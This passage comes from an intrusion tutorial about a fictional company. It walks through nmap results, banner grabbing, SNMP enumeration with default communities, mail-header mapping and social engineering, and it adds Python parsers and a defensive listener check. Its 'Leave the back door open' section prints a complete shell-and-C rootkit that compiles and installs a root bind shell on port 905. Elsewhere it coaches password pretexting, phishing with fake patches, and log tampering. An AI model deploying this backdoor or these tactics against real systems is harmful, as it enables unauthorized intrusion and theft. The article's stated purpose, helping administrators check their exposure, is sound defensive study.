	All 65535 scanned ports on 207.204.120.29 are: closed
	All 65535 scanned ports on 207.204.120.30 are: closed


	# Nmap run completed at Sat Mar 27 14:42:47 2004 -- 
	30 IP addresses (30 hosts up) scanned in 3409.766 seconds


	

The result is not bad : we get a list of hosts in the Silly Software network, their IP addresses, and a number of interesting ports, some even with remote administration services already listening. We can assume they have a firewall, because nmap reports a number of ports as 'filtered'. And of course, the hostname firewall2.silly.com is a dead giveaway :-) .

One more interesting point shows up in the nmap output : the machine with IP address 207.204.120.25 is called sergey.silly.com. Sergey is a man's name. Could they be using public IP addresses for (at least some of) their employees' workstations ? And are workstations named after their users ?

Maybe we can send an email to sergey@silly.com, see what gives.

Also, they have that second 207.204.197.x subnet that could be worth a closer look. And the reverse DNS resolution of some of the scanned addresses turns up interesting sounding names such as 'fw' (firewall ?), 'fwext' (external firewall ?), 'switch' (a switch with remote management ? another router ?) and 'main_nt' (a Windows NT domain controller ?) ...
And so on ...
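Reading a scan of thirty hosts by eye is error prone, so here is, as an added example (not from the book), a parser for nmap's normal output that produces the summary drawn above : which hosts show filtered ports (evidence of a firewall), which have a remote administration service open, and nmap's OS guesses. The scan text is a constructed excerpt of the scan above; the table of ports treated as 'remote administration' is an assumption. For real work, nmap's -oG (greppable) or -oX (XML) output is easier to parse than the normal format used here.

```python
import ipaddress
import re

# Constructed excerpt of the scan above (nmap "normal" output format).
SAMPLE_NMAP = """\
# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as: nmap -sS -O -P0 -oN log 207.204.120.1-30
Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1):
PORT     STATE    SERVICE
1352/tcp filtered lotusnotes
Device type: general purpose
Running: Microsoft Windows NT/2K/XP
OS details: Microsoft Windows NT 4.0 SP 6a + hotfixes

Interesting ports on firewall2.silly.com (207.204.120.2):
(The 65535 ports scanned but not shown below are in state: closed)
PORT    STATE    SERVICE
747/tcp filtered fujitsu-dev
1352/tcp closed lotusnotes

Interesting ports on central.silly.com (207.204.120.5):
(The 65535 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE
1352/tcp open   lotusnotes
5631/tcp open   pcanywheredata
5632/tcp closed pcanywherestat
5900/tcp open   vnc
OS details: Sun Solaris 2.6 - 7 (SPARC), Microsoft Windows NT 4.0 SP 6a + hotfixes

Interesting ports on mail.silly.com (207.204.120.8):
PORT     STATE SERVICE
1352/tcp open  lotusnotes

All 65535 scanned ports on sergey.silly.com (207.204.120.25) are: closed

All 65535 scanned ports on 207.204.120.26 are: closed

# Nmap run completed at Sat Mar 27 14:42:47 2004 -- 30 IP addresses (30 hosts up) scanned
"""

IP = r'(\d{1,3}(?:\.\d{1,3}){3})'
HOST_RE = re.compile(r'^Interesting ports on (?:(\S+) \()?' + IP + r'\)?:')
ALL_RE = re.compile(r'^All \d+ scanned ports on (?:(\S+) \()?' + IP + r'\)? are: (\w+)')
DEFAULT_RE = re.compile(r'^\(The \d+ ports scanned but not shown below are in state: (\w+)\)')
PORT_RE = re.compile(r'^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered|unfiltered)\s+(\S+)')
OS_RE = re.compile(r'^OS details: (.+)')

# Ports whose open state means "someone can administer this box remotely" (assumption).
REMOTE_ADMIN = {23: 'telnet', 513: 'rlogin', 1723: 'pptp', 3389: 'rdp',
                5631: 'pcanywhere', 5800: 'vnc-http', 5900: 'vnc'}


def parse_nmap(text):
    """Return {ip: {'name', 'ports': [(port, proto, state, service)], 'default', 'os'}}."""
    hosts, cur = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line) or ALL_RE.match(line)
        if m:
            cur = hosts.setdefault(m.group(2), {'name': m.group(1), 'ports': [],
                                                 'default': None, 'os': None})
            if m.re is ALL_RE:                  # "All N scanned ports ... are: closed"
                cur['default'] = m.group(3)
            continue
        if cur is None:
            continue
        d, p, o = DEFAULT_RE.match(line), PORT_RE.match(line), OS_RE.match(line)
        if d:
            cur['default'] = d.group(1)         # state of the ports nmap did not list
        elif p:
            cur['ports'].append((int(p.group(1)), p.group(2), p.group(3), p.group(4)))
        elif o:
            cur['os'] = o.group(1)
    return hosts


def summarize(hosts):
    firewalled, remote_admin = [], []
    for ip, h in hosts.items():
        if h['default'] == 'filtered' or any(s == 'filtered' for _, _, s, _ in h['ports']):
            firewalled.append(ip)
        for port, proto, state, service in h['ports']:
            if state == 'open' and port in REMOTE_ADMIN:
                remote_admin.append((ip, h['name'], port, REMOTE_ADMIN[port]))
    key = ipaddress.ip_address
    return {'hosts_reported': len(hosts),
            'firewalled': sorted(firewalled, key=key),
            'remote_admin': sorted(remote_admin, key=lambda r: (key(r[0]), r[2])),
            'os_guesses': {ip: h['os'] for ip, h in hosts.items() if h['os']}}


if __name__ == '__main__':
    for k, v in summarize(parse_nmap(SAMPLE_NMAP)).items():
        print(f'{k}: {v}')
```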

Banner Grabbing

Now that you know the open ports, you can try to find out what software is being used for those services. A quick and easy way to do that is to connect to the host on that port with telnet or netcat. Often, the software replies with some sort of welcome message, or at least a command prompt, that tells what software (and which version) is behind it. Some port scanners will do this for you (recent versions of nmap do, with the -sV option), or you may look on the internet for banner grabbing tools. Nessus is a known name here. Nessus can also "test" the services in question to see if they are vulnerable to common exploits. That saves you the trouble of identifying vulnerabilities and finding suitable exploits yourself.

Here are some examples of what 'banners' may look like, and what they tell you.
You may find yourself welcome to a Linux system

	
		Welcome to SuSE Linux 7.1 kernel 2.2.14
		Have a lot of fun
	
	

or an old Lotus Notes Domino Server

	
		SMTP gateway for Lotus Domino r 4.6
		_

	

or a pop 3 server ...

	
		+OK POP3 [cppop 9.9] at [209.51.159.225]

	

This information can later be used to look up what kind of attack or exploit this particular version of that specific software package is vulnerable to. Of course, things like VPN and pcAnywhere services are tempting finds during a port scan : all you need for those is a VPN or pcAnywhere client, and you can check whether the system administrator forgot to remove the default accounts and change the factory settings. If so, these services are an open door into the network.

Be careful how you read the port states. 'Filtered' means nmap got no answer at all (or an ICMP unreachable) : something between you and the host, or the host's own packet filter, dropped the probe, so you cannot tell whether a service is listening there. 'Closed' means the host itself answered with a TCP reset : it is reachable, but nothing is listening on that port. Note that a firewall configured to reject rather than drop can make a filtered port look closed, and that when you scan through a NAT router or firewall, the answers may come from that device rather than from the host you think you're scanning.
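As an added example (not from the book), here is a minimal banner grabber with a classifier for the banners shown above, plus SSH and HTTP : connect, optionally send a probe (HTTP servers say nothing until asked), read what comes back and extract the product and version with a regular expression. The patterns are assumptions derived from the three banners on this page; the hosts in this summary are imaginary, so the grabber is only exercised against a closed local port.

```python
import re
import socket

# Patterns for the banners shown above plus two common ones (SSH, HTTP);
# the captured product/version fields are what you feed into a vulnerability lookup.
BANNER_PATTERNS = [
    ('linux-login', re.compile(r'Welcome to (SuSE Linux [\d.]+) kernel ([\d.]+)')),
    ('lotus-domino', re.compile(r'Lotus Domino r\s*([\d.]+)', re.I)),
    ('pop3', re.compile(r'^\+OK POP3 \[(\w+) ([\d.]+)\]')),
    ('ssh', re.compile(r'^SSH-[\d.]+-(\S+)')),
    ('http', re.compile(r'^Server:\s*(.+?)\s*$', re.M)),
]

HTTP_PROBE = b'HEAD / HTTP/1.0\r\n\r\n'


def classify_banner(banner):
    """Return (kind, captured product/version fields) or ('unknown', ())."""
    for kind, pattern in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            return kind, m.groups()
    return 'unknown', ()


def grab_banner(host, port, timeout=3.0, probe=b''):
    """Connect, send an optional probe, return the first bytes the service
    sends, or '' if the connection failed or nothing arrived in time."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            return s.recv(1024).decode('latin-1', 'replace')
    except OSError:                      # refused, unreachable, or timed out
        return ''


if __name__ == '__main__':
    samples = ['Welcome to SuSE Linux 7.1 kernel 2.2.14\nHave a lot of fun',
               'SMTP gateway for Lotus Domino r 4.6',
               '+OK POP3 [cppop 9.9] at [209.51.159.225]']
    for b in samples:
        print(classify_banner(b))
    # live use: print(classify_banner(grab_banner('target', 80, probe=HTTP_PROBE)))
```

Two practical notes : a service that needs a probe first (HTTP, and some SMTP servers behind proxies) returns nothing to a silent connect, and a banner can be edited by the administrator, so treat it as a hint, not proof, until the behaviour of the service confirms it.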

snmp

snmp, the simple network management protocol, is a protocol to monitor devices remotely, over the network. System administrators use it to monitor routers, switches, computers, printers, ... If the snmp service is accessible from the outside, it can be used to collect a complete description of the system in question. So it's worth checking. snmp agents are usually configured with a default "public" community that allows read access (and often a "private" one that allows writes). The community name serves as a password, but it travels in clear text, and sysadmins forget to change it, so ...
snmp version 3 supports real authentication and encryption. Maybe it's time to upgrade - or at least change your community names and restrict which addresses may talk to the agent.

snmp uses UDP (port 161), so it doesn't show up in a default (TCP) port scan. You can explicitly scan UDP ports (nmap -sU -p 161), or just try to access snmp on the target(s) and see if it responds.

	for target in $list_of_targets; do
		# one GET of sysUpTime with the default read community, short timeout
		snmpget -v1 -c public -t 1 -r 1 "$target" system.sysUpTime.0
	done
	

For those hosts where you can access snmp, you can use snmpwalk (or snmpbulkwalk, which uses the more efficient SNMPv2c GETBULK request) to walk the entire snmp tree :

	for item in $list_of_snmp_targets; do
		# same version and community as above; keep each dump for later grepping
		snmpwalk -v1 -c public "$item" > "snmp-$item.txt"
	done
	

snmp data is organized in modules ("MIBs"), and depending on the system you're interrogating, it is useful to specify a module or subtree to get specific information. For instance, you can walk the LanMgr-Mib-II-MIB (the Windows LAN Manager MIB) to retrieve shared directories, sessions, user account names, ... from a Windows system. On routers, you may be interested in the ip subtree of MIB-II (the routing table, ipRouteTable, and the ARP cache, ipNetToMediaTable), and in the interfaces subtree for the interfaces and their addresses.
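The net-snmp tools above hide what actually goes on the wire. As an added example (not from the book), here is an SNMPv1 GetRequest built by hand in BER (the ASN.1 encoding SNMP uses, RFC 1157), with a UDP probe function and a minimal check of the answer. It shows why the community string is no protection : it is the plain 'public' string a few bytes into every packet. Everything here is standard protocol; the probe is not run against any real host in this text, and the GetResponse used to check the decoder is constructed.

```python
import socket

SYS_UPTIME = '1.3.6.1.2.1.1.3.0'      # sysUpTime.0, the classic "are you there" object
SYS_DESCR = '1.3.6.1.2.1.1.1.0'       # sysDescr.0: OS and version in one string


def ber_len(n):
    """BER length: short form below 128, otherwise 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(value):
    """Non-negative INTEGER; the extra byte in the size keeps the sign bit clear."""
    if value < 0:
        raise ValueError('only non-negative integers are needed here')
    return tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, 'big'))


def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*x+y, then base-128 with continuation bits."""
    arcs = [int(a) for a in dotted.strip('.').split('.')]
    subids = [arcs[0] * 40 + arcs[1]] + arcs[2:]
    out = bytearray()
    for s in subids:
        chunk = bytearray([s & 0x7F])
        s >>= 7
        while s:
            chunk.insert(0, 0x80 | (s & 0x7F))
            s >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


def build_get_request(community, oid, request_id=1):
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, GetRequest-PDU [0] }"""
    varbind = tlv(0x30, ber_oid(oid) + tlv(0x05, b''))                # { oid, NULL }
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0)      # id, error-status, error-index
              + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community) + pdu)


def read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], 'big'), pos + n
    return tag, buf[pos:pos + length], pos + length


def response_summary(data):
    """(request-id, error-status) of a GetResponse-PDU, or None if data is not one."""
    tag, msg, _ = read_tlv(data)
    if tag != 0x30:
        return None
    _, _, p = read_tlv(msg)            # version
    _, _, p = read_tlv(msg, p)         # community
    tag, pdu, _ = read_tlv(msg, p)
    if tag != 0xA2:                    # GetResponse-PDU is tagged [2]
        return None
    _, rid, p = read_tlv(pdu)
    _, err, _ = read_tlv(pdu, p)
    return int.from_bytes(rid, 'big'), int.from_bytes(err, 'big')


def snmp_probe(host, community=b'public', oid=SYS_UPTIME, timeout=2.0):
    """Send one GetRequest to UDP/161. A v1 agent that rejects the community
    string stays silent, so any well-formed GetResponse means it was accepted."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, oid), (host, 161))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return response_summary(data)


if __name__ == '__main__':
    print(build_get_request(b'public', SYS_UPTIME).hex())
    # live use: print(snmp_probe('192.0.2.1'))
```

The 40-byte packet printed by the script is the same one snmpget sends for sysUpTime.0; a sniffer on the path sees the community string in clear, which is the whole argument for SNMPv3 or, failing that, for an access list on the agent.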

Some samples of snmp output :

MIB depot

Service specific information

With the information gathered so far, you may have discovered new ways to find out more about the network you're aiming at. For instance, if you found that some hosts are running NetBIOS (TCP ports 137-139, and 445 on Windows 2000 and later), this can be used to retrieve additional information about user names, computer names, possibly also network shares and so on, often over an anonymous "null session". This page shows NetBIOS vulnerabilities in this respect.

To get some insight into the LAN layout, you might send an email to info@silly.com, get a reply, and read the headers to see how that reply travelled from the sender (with his IP address and/or host name) through the mail servers to you. Or use one of the email addresses you've found so far.


		Received: from PC_212	(adsl2256.ppp.my.com [207.201.179.14])
	

Asking for a read receipt, and looking at the headers when you get it, can also tell you a few things about how mail reaches its destination at The Silly Software Company and thus (partially) illustrate the layout of the network.
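Reading Received headers by hand gets tedious after the second reply, so here is, as an added example (not from the book), a parser that walks them oldest-first and extracts, for every hop, the name the client announced, what the receiving server saw (reverse DNS and address), which server added the line, its software if it says so, and the protocol used. The message is a constructed reply built around the Received line quoted above; no real mail is involved.

```python
import email
import ipaddress
import re

# Constructed reply: two Received lines, newest on top as mail servers add them.
# Not a real message.
SAMPLE_MESSAGE = """\
Received: from mail.silly.com (mail.silly.com [207.204.120.8])
\tby mx1.my.com (Postfix) with ESMTP id 4F2A1
\tfor <you@my.com>; Sun, 21 Mar 2004 13:02:11 +0100
Received: from PC_212 (adsl2256.ppp.my.com [207.201.179.14])
\tby mail.silly.com (Lotus Domino Release 5.0.12) with SMTP id 2004032113014;
\tSun, 21 Mar 2004 13:01:45 +0100
From: Ned <ned@silly.com>
To: you@my.com
Subject: Re: info request

Thanks for your interest.
"""

RECEIVED_RE = re.compile(
    r'from\s+(?P<helo>\S+)'                    # name the client announced (HELO)
    r'(?:\s+\((?P<info>[^)]*)\))?'            # what the server saw: rDNS and [ip]
    r'\s+by\s+(?P<by>\S+)'                    # the server that added this line
    r'(?:\s+\((?P<by_sw>[^)]*)\))?'           # and, often, its software
    r'(?:.*?\bwith\s+(?P<with>\S+))?', re.I)  # protocol used
IP_RE = re.compile(r'\[(\d{1,3}(?:\.\d{1,3}){3})\]')


def parse_received(raw_message):
    """Return the hops oldest-first: each dict describes one mail server handoff."""
    msg = email.message_from_string(raw_message)
    hops = []
    for value in msg.get_all('Received', []):
        flat = ' '.join(value.split())          # unfold continuation lines
        m = RECEIVED_RE.search(flat)
        if not m:
            continue
        info = m.group('info') or ''
        ip = IP_RE.search(info)
        rdns = info.split()[0] if info and not info.startswith('[') else None
        hops.append({
            'helo': m.group('helo'), 'rdns': rdns,
            'ip': ip.group(1) if ip else None,
            'private_ip': bool(ip) and ipaddress.ip_address(ip.group(1)).is_private,
            'by': m.group('by'), 'by_software': m.group('by_sw'), 'with': m.group('with'),
        })
    return list(reversed(hops))


if __name__ == '__main__':
    for i, hop in enumerate(parse_received(SAMPLE_MESSAGE), 1):
        print(f"hop {i}: {hop['helo']} ({hop['rdns']} {hop['ip']}) -> {hop['by']} "
              f"[{hop['by_software']}] via {hop['with']}")
```

The 'private_ip' flag is there because an internal relay often stamps its RFC 1918 address into the header, which hands you the first piece of the LAN layout; the 'by_software' field does the same job as a banner, without touching the server.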

Social Engineering

So far, we've only collected information that is readily available, because the internet as it is would not be able to function without it, and information that can be readily retrieved when sloppy sysadmins forget to take precautions against it. Next, all we did was put two and two together. To find out more, we'd have to either target specific holes in the security, or use so-called "social engineering".

Social engineering is something of a euphemism. To fill the gaps in the information you've collected so far, you may resort to dirty tricks such as calling the receptionist at the Silly Software Company, telling her you're the helpdesk and could she please tell you her password because you need to check something. She might just give it. She may also tell you the login name and password of her boss, who is such a moron that she always needs to help him whenever he's at a loss with some computer thing.

You may also start hanging out at the place where the Silly Software techies hang out for lunch, for happy hour, or on Friday after work, and hear them tell stories about how stupid their colleagues are, and so on. Stories that may contain interesting details about the IT systems in the company. Interesting details that help you understand what your target looks like, and where the weak points may be.

Another approach could be to visit newsgroups and forums, and look for entries related to the company you're targeting, or the names of its employees. One of the network administrators might have asked for help with a problem that could be of particular interest.

So, social engineering has nothing to do with engineering, nothing to do with network protocols or data communication - it's just exploiting human weakness, but it's called social engineering to make it fit the picture of the intelligent, technology oriented whiz who can get into any system.

Nonetheless, it goes to show that the human factor can be one of the weak points in a well protected system, so it's good to be aware of it.

Point of Attack

At this point, we have an idea what the local network at the Silly Software Company may look like, we know where on the internet we can find them, we have some indications of the software they're running, we have some background information about the company, and maybe its employees, and so on. Time to decide how to proceed. A lot depends on what you're after.

We could target one of the servers, e.g. the mail server or the system with hostname 'scc-gate', either as the final goal or as a way to penetrate deeper into the network (other hosts may accept actions from their own servers that they don't accept from external systems, so some level of control over such a server may get us further ...).

Mail servers are a popular target, because they hold user accounts : logins, passwords. They must be publicly accessible for mail to be delivered, and they are often trusted by the other hosts on the network, so they can be used as a point of entry. They also hold the mail messages, if that's what you're after. Or the mail messages may contain information that helps you penetrate deeper into the network.

We have some information about ports that we can connect to (and the services that will reply, maybe the operating systems, etc). That may open opportunities, if there are known security issues with that software. In a case like this, it may be worth a try to get a pcAnywhere or VNC client and try to connect to the hosts listening for pcAnywhere or VNC. If the network administrator did a sloppy job, some factory settings (default users, passwords, ...) may still be active, and you walk right in.

Method of Attack

The method of attack will be adapted to the point of attack, discussed previously, because it is, at least partially, dictated by the software you find on the target system. There are several ways. Maybe you can locate and retrieve the password file, so that you can try to connect to the system as a legitimate user, and take it from there. Or maybe one of the services is susceptible to a buffer overflow exploit, which might allow you to open a shell (a command prompt) from where you can access the system, maybe create a superuser account for yourself, or so. Then there are rootkits : collections of tools that, once you have 'root' (system administrator) privileges, replace system programs such as ps, ls and netstat with versions that hide your processes, files and connections, and usually plant a back door for later. Or maybe you have sufficient access to drop a 'Trojan Horse' on the system, that will let you right in next time.

Your first attack may also be aimed at just collecting additional information for future attacks : grab a password list, find a way to get a packet sniffer on the network to read the data being transmitted, etc.

Another typical method is to gain access to the network with limited privileges, as guest, or with anonymous FTP or something similar, then apply some tricks or exploit some sysadmin sloppiness to upgrade your account, upload a rootkit, steal the password file, ... in order to get control ("own the system"). Here's a description of how an FTP server with some configuration mistakes resulted in complete 'root' access to a server : How we defaced apache.org (http://www.dataloss.net/papers/how.defaced.apache.org.txt).

Leave the back door open

After you've gone through all this trouble, you don't want to shut yourself out, so you'll leave a way to sneak in more easily next time. Create a user account (and remember the password), leave a back door program that you can connect to without hassle, etc.

Tools for this kind of activity can be readily found on the web. Of course, you will have to trust the guy who created them : his virus creation tool or trojan construction tool may well include a few lines of code that create a backdoor on your own system as well. :-)

Here are a couple of examples I found without too much trouble. I haven't tried them so I don't know if they will work. I include them because they're easy-to-understand examples of how features of the operating system on the target can be exploited if the sys admin is a bit naive. For systems with less naive sysadmins, I'm sure there are more sophisticated tricks out there.

Windows NT

Windows NT (and other Microsoft Windows systems) still have the autoexec.bat. This is a script that is automatically executed every time the system (re-)boots. They also have the AT command, that can be used to have commands/scripts/programs executed at a given date/time or with a given schedule. This is often considered God's gift to crackers, as it can be used to have commands, scripts, programs, ... executed on the targeted system. One can imagine that an intruder tries to add a few lines to the autoexec.bat, then waits for the system to be rebooted (or gets it to reboot by causing it to crash).

Another fine tool is getadmin.exe, a program that uses a flaw in Windows NT to add the user account of your choice to the Administrators group, thus giving that account full Administrator privileges. getadmin.exe is a bit outdated (the flaw in Windows is patched) - but you get the idea. And there are probably other tools out there.

Once you are Administrator, there is no limit to what you can do. With VBS, you can execute any administrator task on the remote machine, including creating new accounts (in case the one you're using is found and removed), or changing passwords on existing accounts.

Linux / Unix

The following trick is supposed to work on Unix / Linux systems : upload a script that contains the source code (in C) of a backdoor program, and some shell commands to compile and run it on the targeted system, using that system's own C compiler (gcc, usually present by default on any Linux / Unix-like system).


	#!/bin/sh
	# Fearless Rootkit R-Type v0.1
	# Coded by Merlion
	#
	# If you do, you do so at your OWN risk

	cat > /tmp/rootd.c << EOF

	#include <stdio.h>
	#include <string.h>
	#include <netdb.h>
	#include <netinet/in.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <unistd.h>

	void die(char *error);

	main(int argc, char **argv) {
	    pid_t pid, sid;
	    int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen;
	    unsigned short int mcon;
	    unsigned short int port;
	    char *rbuf, *rmode;
	    struct sockaddr_in Client, Server;

	    if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
	    if (argc != 3) die("Usage");
	    memset(&Server, 0, sizeof(Server));
	    Server.sin_family=AF_INET;
	    port=905;
	    mcon=5;
	    Server.sin_port=htons(port);
	    Server.sin_addr.s_addr=htonl(INADDR_ANY);
	    if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
	        die("No socket options set");
	    if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
	        die("Could not bind socket");
	    if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");
	    pid=fork();
	    if (pid < 0) die("Initial fork() failed");
	    if (pid>0) exit(0);
	    if ((chdir("/")) < 0) die("Could not set working directory");
	    if ((setsid()) < 0) die("setsid() failed in creating daemon");
	    umask(0);
	    close(STDIN_FILENO);
	    close(STDOUT_FILENO);
	    close(STDERR_FILENO);

	    while(1) {
	        socklen=sizeof(Client);
	        if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1);   /* syslog msg here still */
	        clipid=getpid();
	        serpid=fork();
	        if (serpid > 0)
	            waitpid(0, &stat, 0);
	        dup2(sockcli, 1);
	        execl("/bin/sh","sh",(char *)0);
	    }
	    close(sockcli);
	}

	void die(char *error) {
	    fprintf(stderr, "%s\n", error);
	    exit(1);
	}

	EOF

	gcc -o /bin/rootd /tmp/rootd.c
	rm -f /tmp/rootd.c
	/bin/rootd

	echo "Rootd successfully installed"
	exit 0
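From the administrator's side, the script above leaves a root-owned process listening on TCP port 905 on every interface, so a simple check on a Linux host is to compare the kernel's socket table (/proc/net/tcp) against the services you expect to be listening. The following is an added example, not code from the book or from this article; the /proc/net/tcp sample lines and the list of expected ports are constructed for it.

```python
import socket
import struct

# Constructed sample of /proc/net/tcp: ssh on all interfaces, smtp on
# loopback, a rootd-style listener on port 905, and one established http session.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 0000000000000000 100 0 0 10 0
   2: 00000000:0389 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9876 1 0000000000000000 100 0 0 10 0
   3: 0A000005:0050 0A000017:C350 01 00000000:00000000 00:00000000 00000000    33        0 4444 1 0000000000000000 20 4 30 10 -1
"""

# Ports this (imaginary) host is allowed to listen on; everything else is reported.
EXPECTED_PORTS = {22: "ssh", 25: "smtp", 80: "http"}

TCP_LISTEN = 0x0A  # socket state code for LISTEN in /proc/net/tcp


def parse_proc_addr(field):
    """'0100007F:0019' -> ('127.0.0.1', 25): IPv4 is a host-order hex word, port is hex."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))  # host order is little-endian on x86
    return ip, int(port_hex, 16)


def unexpected_listeners(proc_net_tcp):
    """Return (ip, port, uid, inode) for every LISTEN socket whose port is not expected."""
    findings = []
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10 or int(fields[3], 16) != TCP_LISTEN:
            continue
        ip, port = parse_proc_addr(fields[1])
        if port not in EXPECTED_PORTS:
            # uid 0 on an unknown port is exactly the rootd pattern; the inode can be
            # matched against /proc/<pid>/fd/* to find the process that owns the socket.
            findings.append((ip, port, int(fields[7]), int(fields[9])))
    return findings


if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as f:
            table = f.read()
    except OSError:  # not on Linux: fall back to the constructed sample
        table = SAMPLE_PROC_NET_TCP
    for ip, port, uid, inode in unexpected_listeners(table):
        print(f"unexpected listener {ip}:{port} uid={uid} inode={inode}")
```

On a real host the allowed-port list has to be maintained as part of the build documentation, otherwise the check degrades into the same "whatever the defaults are" situation the conclusion warns about.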

	

more ...

More elaborate stuff can be found on the Web, like here:

Next ...

So, you have access to the Silly Software Company's resources. Now what ? The decent thing to do would be to warn them about the security holes in their system, e.g. by sending the system administrator an email explaining what you've done, and how. If you send the mail from within their system, like from the sys admin's own email account, it's more impressive, and it proves you're not joking.

The black hat approach would now be to use their system for your own benefit, like steal information, or install an FTP server to distribute 'warez', or use their computers as zombies for a Denial of Service attack against your next victim, or use their mail system to start spreading viruses, or run your next intrusion from one of their computers so that it won't be traced back to you, or whatever.

Typically, the intruder will also try to cover his tracks by modifying log files, creating hidden files or folders to hide any stuff that has been uploaded, or placing his tools in folders with normal-sounding names or using file names that may look as if they belong to the system. A system administrator would need to know his system quite well to notice these changes.

Shortcuts

There are a couple of ways to shortcut the above procedure. For starters, it helps if you're already on the inside. 80 % of all 'intrusions' are done from within, i.e. by employees. That saves the trouble of having to penetrate the network from the outside. Also, employees have accounts already, so their goal would be to find a way to get superuser privileges (privilege escalation), or find holes, inconsistencies, mistakes in the access privileges that would allow them access to information they were not intended to see or modify. At the least, they only have to look at their own account to see what format usernames and passwords have, which might help.

Penetrating a network is also easier if someone lets you in. You may send emails to The Silly Software Company's employees and make it look as if they come from the system administrator (you know his email address from the DNS lookup !). If you can convince them to execute a certain program ("here's a patch that will repair the problem you've had with your computer. just open the attachment" - that should work : everyone has had problems with computers before ...), you can try and have them install a backdoor that you can use to get in.

Conclusion

The availability of DNS and RIPE information is part of the design of the internet. DNS, RIPE ('whois'), and other online databases are necessary for the internet to function. There is also nothing wrong with servers having publicly accessible ports / services - you can't run a web server without allowing people to connect to its port 80. On the other hand, all this information combined can tell an attacker more than you expect. Lists of networks, IP addresses and routes may allow an attacker to draw a map of your networks and make educated guesses about additional private networks, routes, and possibly VPN tunnels. Private IP addresses can be used for address spoofing so packets appear to be coming from a trusted network. User names and email addresses can be used in social engineering or to make educated guesses about account names. A list of installed software or running services, and their patch level (e.g. from SNMP) greatly simplifies the search for vulnerabilities or exploits. If someone has a list of user accounts, all he needs to do is find a matching password - way easier and faster than having to guess (brute-force, word list, ...) user name - password combinations.

So, while you cannot avoid having some info publicly accessible, a security-aware system administrator should really consider what information is to be made public, and to whom - and take steps to implement that instead of accepting whatever defaults came with the package. A few simple steps will greatly reduce your exposure :


Disclaimer

Names and addresses have been changed.
Any similarity with existing persons, companies or events is unintended and purely coincidental.
The purpose of this article is to illustrate how cracking and intrusion can be done, so that people can check if any of the above methods could be applied against their systems. This article should not, in any way, be seen as a manual for or encouragement of criminal activity of any kind.